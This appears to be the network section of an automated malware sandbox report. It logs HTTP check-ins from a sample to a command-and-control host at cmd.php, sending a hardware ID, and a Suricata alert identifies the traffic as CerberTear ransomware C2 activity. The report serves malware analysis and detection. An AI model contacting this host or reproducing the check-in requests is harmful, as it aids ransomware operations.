Network Analysis
| Name | Response | Post-Analysis Lookup |
|---|---|---|
| mrmax4td.beget.tech | 91.106.207.89 |
GET
200
http://mrmax4td.beget.tech/cmd.php?hwid=7C6024AD
REQUEST
RESPONSE
BODY
GET /cmd.php?hwid=7C6024AD HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
Host: mrmax4td.beget.tech
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx-reuseport/1.21.1
Date: Wed, 21 Dec 2022 01:11:34 GMT
Content-Type: text/html
Content-Length: 3
Connection: keep-alive
Keep-Alive: timeout=30
X-Powered-By: PHP/5.6.40
GET
200
http://mrmax4td.beget.tech/cmd.php?timeout=1
REQUEST
RESPONSE
BODY
GET /cmd.php?timeout=1 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
Host: mrmax4td.beget.tech
HTTP/1.1 200 OK
Server: nginx-reuseport/1.21.1
Date: Wed, 21 Dec 2022 01:11:34 GMT
Content-Type: text/html
Content-Length: 4
Connection: keep-alive
Keep-Alive: timeout=30
X-Powered-By: PHP/5.6.40
GET
200
http://mrmax4td.beget.tech/cmd.php?hwid=7C6024AD
REQUEST
RESPONSE
BODY
GET /cmd.php?hwid=7C6024AD HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
Host: mrmax4td.beget.tech
HTTP/1.1 200 OK
Server: nginx-reuseport/1.21.1
Date: Wed, 21 Dec 2022 01:12:34 GMT
Content-Type: text/html
Content-Length: 3
Connection: keep-alive
Keep-Alive: timeout=30
X-Powered-By: PHP/5.6.40
GET
200
http://mrmax4td.beget.tech/cmd.php?timeout=1
REQUEST
RESPONSE
BODY
GET /cmd.php?timeout=1 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
Host: mrmax4td.beget.tech
HTTP/1.1 200 OK
Server: nginx-reuseport/1.21.1
Date: Wed, 21 Dec 2022 01:12:34 GMT
Content-Type: text/html
Content-Length: 4
Connection: keep-alive
Keep-Alive: timeout=30
X-Powered-By: PHP/5.6.40
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
| Flow | SID | Signature | Category |
|---|---|---|---|
| TCP 192.168.56.101:49166 -> 91.106.207.89:80 | 2023505 | ET MALWARE CerberTear Ransomware CnC Checkin | Malware Command and Control Activity Detected |
Suricata TLS
No Suricata TLS
Snort Alerts
No Snort Alerts